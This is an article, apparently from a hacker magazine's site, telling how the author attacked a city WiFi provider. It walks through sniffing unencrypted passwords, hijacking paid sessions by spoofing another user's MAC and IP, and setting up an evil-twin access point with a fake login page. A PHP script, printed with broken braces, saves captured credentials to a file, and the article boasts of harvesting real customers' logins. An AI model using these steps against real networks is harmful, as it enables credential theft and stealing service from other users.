Welcome Guest | RSS

Official Site Of The Xakep 4T english version

Monday, 2018-10-22, 1:04 AM
Main » 2011 » April » 16 » Air colander: A tale about how one large wireless provider was hacked
8:27 AM
Air colander: A tale about how one large wireless provider was hacked

Admit that "Wireless Internet in every home" is a very attractive slogan. It sounds great when your ISP, which granted a dial-up access 5 years ago, deploys a big WiFi infrastructure throughout the whole city (or at least in its center) just in a few days. It would sound like a fools dream came true and now you can enjoy fast internet connection while sitting in McDonald's and mopping up another macfresh. But when you look closer you realize that it can’t happen all that way because ISP (and all its customers thereafter) information security leaves a lot to be desired. In order not to make unsubstantiated statements I suggest your attention a case of an informal audit of the newly born wireless network and who knows, maybe you will realize its credibility having bitter experience with your provider.

Let’s agree in advance: in order to observe etiquette and not to embarrass my ISP, I will not name specific sites and brands. Moreover, the law was not violated and the audit was made using own honestly purchased accounts only. The purpose of this article is not to tarnish the company’s honor but to show general weak points of WiFi infrastructure, which can be certainly found in WiFi networks of largest providers.

First disappointment

So, let’s get back to marketing. Imagine a large Russian million-plus city which became full of advertising slogans like: "Wireless, fast and convenient Internet access", "Enjoy the Web in your favorite cafe”, etc. When your city offers such opportunity you want to implement it immediately. After all, you must agree that it’s convenient to sit in some cafe with your faithful laptop- friend and talk through ICQ on some urgent matters.

But after I got a series of disconnects I felt that first disappointment experience. And not even because the broadband connection is weak, but because of re-authorization was not required when re-connecting (even after 10 minutes of connect).

What the hell is that? It means I pay for the Internet access and the ISP doesn’t even care about my security (all my sessions are theoretically available to be accessed by some other people when I break the connection and leave the place!). I decided to sniff the network a bit in order to check my assumptions after I got that "surprise”.

I didn’t sniff that large list of cafe visitor’s notebooks (who were connected to the same wireless ISP) as I’m a girl who abides the law. Instead, I invited a friend with a laptop :). He bought me a cup of coffee and started imitating a frantic Internet activity (he launched ICQ, entered a social network, checked his mail, etc.).

Sniff and ... strangle!

In order not to waste time, I launched the WireShark and started to monitor the perimeter. Among all the data package traffic I immediately saw the SSL protocol "handshake” on the provider’s website...

By the way, do you know how the authentication of connection is done? First, the client connects to the insecure WEP/WPA-point. After he turns the browser and enters any web site he is redirected to the ISP login page. There he enters his personal login and password details (which are resolved by sending SMS-message to some specific number) and then, apparently, a rule is created on the router. That specific rule allows that specific user to get the Internet connection.

So, after I passed that SSL-encrypted authentication I saw absolutely unencrypted password and mail details from VKontakte social network, some slightly XORed ICQ passwords (which can easily be decrypted with an Ufasoft Sniffer or InterCepter software) and also some indecent porn sites links (my friend is not a shy one... :). I don’t mention all other network clients (I have filtered them on IP-address in order not to violate the law).

But as they say, if you want something bad you can (and should!) violate some things a little (just to expand the horizons :). It is easy to spoof if you know all IP and MAC-addresses of the perimeter users (they can be recognized by ARP-messages analysis).

ISP web site states that you should "Log out” from authorization web site before disconnecting from the network, otherwise your account will be available to connect for some time after you close the connection. This is just what we need, because not every user will bother with that :).

So, we will substitute the MAC address of your wireless adapter with the neighbor's MAC doing it with a help of a nice MAC address changing software which is "MACChange" (you can also do it manually, it depends on one’s taste).

Do not forget to assign his IP too. Now try to connect the network. Lo and behold! It appears that ISP allows as the DHCP-addressing so the Static-addressing. So, you can enjoy the pleasures of wireless Internet absolutely for free! Or I’d rather say for someone else's expense!

And what if..?

Well, now if we have already violated the law now let’s try to deepen and broaden our experience for the sake of experiment. What else can we do to show all those wireless network weak points? A thought about fake access point MitM-attack comes to my mind, but it can’t be done within the cafe location.

To do that we have to have several components: a web server, an access point and a laptop for tests.

So I had to go back home and look through the dusty shelves for some old DIR-300 and configure it as DHCP-server. I’ve also identified the access point SSID the same as operators.

I chose a compact and convenient "Small HTTP Server" as a web server. Many words have been said about that software. I like it because of convenient interface and a pretty wide functionality despite of very small size.

Set up the WEB-server and DNS-server, so when the user will try to enter any Web page he’ll be directed to HTML-page which looks like ISP web site login page. Now create a PHP script which will save all entered form information in a separate .txt file.

$filename = 'S:\home\localhost\www\info.txt';
$a = $_GET['login'];
$b = $_GET['password'];
$somecontent = " -- Login - \n".$a." --Password - \n".$b." -- \n";
if (is_writable($filename))

if (!$handle = fopen($filename, 'r+')) {
echo " Cannot open the file ($filename)";
if (!fwrite($handle, $somecontent)) {
echo " Unable to write to the ($filename) file ";
else{echo " ";}
echo "Written ($somecontent) to the ($filename) file";
} else {
echo "File $filename is not writable ";

The fake is ready to be used. Now let’s run it!

MitM in action

The plan of stealing login details for wireless network access is as follows: user activates one’s Wi-Fi adapter and tries to connect to the wireless network. In the list of available wireless networks he sees the fake access point with the same SSID as ISP has. The system makes it to go first, because it has better signal then operator’s does. User connects to your fake access point and enters your browser and goes to the fake login page respectively. This page has an interface which is similar to the ISP login interface. User enters one’s login details in the appropriate fields with suspecting nothing bad. At last, when user clicks the "Enter" button he activates the PHP-script which stores all user typed data to a text file on your server. User will stay with no internet connection (and, of course, without one’s login and password :) - editor's note).

Let’s try to login to a fake access point in order not to lose sight of some details. Fill in login details and press "Enter". Nothing happens further. That’s the way the regular user think. Meanwhile, our script had already done its dirty little business and all login details are already stored on the server. Now let’s open the txt file and see its contents. Voila! Here are the data we’ve typed and there’s a surprise! Someone had already connected to our fake access point and now there are a couple of real logins and passwords you can use to log into your SIP real wireless network. Even SSL-authorization does not prevent the theft of login details in such case.

The patient is likely alive than dead

What can I say? The worst thing is that more than a half wireless networks of the country work according to a similar authentication scheme (I know at least four big million-plus cities). And no one can guarantee the users legitimacy. In this case service owners almost never warn their customers about the vulnerability of their data and the risks of personal information to be stolen. They all are eager to increase one’s profits while neglecting all security methods. Providing higher security level will reduce the data rate and complicate the process of customer equipment setting up.

So finally, I want to give a good advice to all of you, guys: pay attention to the access point you connect to and do not send any important information through any unprotected networks (or use the VPN-connection) because it can lead to some fatal consequences.


Warning! The information is presented strictly in the interest of education! Neither the author nor editors are responsible for any actions you might undertake!

Views: 7841 | Added by: XakepNews | Rating: 5.0/1
Total comments: 0